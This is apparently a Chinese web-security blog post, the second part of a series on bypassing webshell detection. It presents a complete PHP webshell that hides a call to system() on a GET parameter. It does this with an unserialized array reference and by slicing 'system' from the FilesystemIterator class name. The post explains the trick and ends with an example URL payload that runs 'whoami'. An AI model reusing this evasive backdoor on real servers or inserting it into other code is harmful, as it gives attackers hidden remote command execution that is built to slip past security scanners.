WEB安全--RCE--webshell bypass2

继WEB安全--RCE--webshell bypass的补充:

六、PHP反序列化

webshell:

php 复制代码
<?php
$s= 
unserialize('a:2:{i:0;O:8:"stdClass":1:{s:1:"a";i:1;}i:1;r:2;}');
$c = "123";
$arr= get_declared_classes();
$i=0;

for($i;$i<count($arr);$i++){
 $i++;
 $s[1]->a=$_GET['a'];
 if($i<97 || $i>=98){
 continue;
 }
 $c=$s[0]->a;
 print(substr(get_declared_classes()[55],4,6)($c));
}
?>

原理:

打印$s:

可以看到$s反序列化后有两个值,但是源码中似乎只有一个stdClass;原因是[0]是由[1]引用复制后的值,可以理解为**[1]的变化会导致[0]的变化**。

打印$arr:

基于上述两个打印值对源码进行分析,我们不难得出其原理:

一开始$c = "123",进入for循环;

s\[1\]-\>a = _GET['a']一直在接收我们的传参,不过由于if判断,当$i = 97时才会进入下一步;

此时s\[1\]-\>a的值是我们URL传递的参数,而c = s\[0\]-\>a,且s[1]->a 的值会同步影响s\[0\]-\>a,所以c = $_GET['a'];

get_declared_classes()[55]对应的是FilesystemIterator,通过截取取出system;

最后 print(substr(get_declared_classes()[55],4,6)($c)) 就会变成:

print(system($_GET['a']))

payload:

php 复制代码
http://127.0.0.1/rce/bypass.php?a=whoami
相关推荐
FreeBuf_5 小时前
最新研究揭示云端大语言模型防护机制的成效与缺陷
网络·安全·语言模型
CYRUS_STUDIO8 小时前
FART 脱壳某大厂 App + CodeItem 修复 dex + 反编译还原源码
android·安全·逆向
网硕互联的小客服9 小时前
如何利用Elastic Stack(ELK)进行安全日志分析
linux·服务器·网络·安全
浩浩测试一下10 小时前
Authpf(OpenBSD)认证防火墙到ssh连接到SSH端口转发技术栈 与渗透网络安全的关联 (RED Team Technique )
网络·网络协议·tcp/ip·安全·网络安全·php
网安INF10 小时前
CVE-2020-17518源码分析与漏洞复现(Flink 路径遍历)
java·web安全·网络安全·flink·漏洞
四川合睿达自动化控制工程有限公司11 小时前
大中型水闸安全监测管理系统建设方案
安全
赛卡11 小时前
汽车安全:功能安全FuSa、预期功能安全SOTIF与网络安全Cybersecurity 解析
人工智能·安全·网络安全·车载系统·自动驾驶·汽车
CatalyzeSec12 小时前
一些实用的chrome扩展0x01
安全·web安全·网络安全
leagsoft_100312 小时前
筑牢企业网管域安全防线,守护数字核心——联软网管域安全建设解决方案
网络·安全·网络安全
黑客笔记12 小时前
攻防世界-XCTF-Web安全最佳刷题路线
大数据·安全·web安全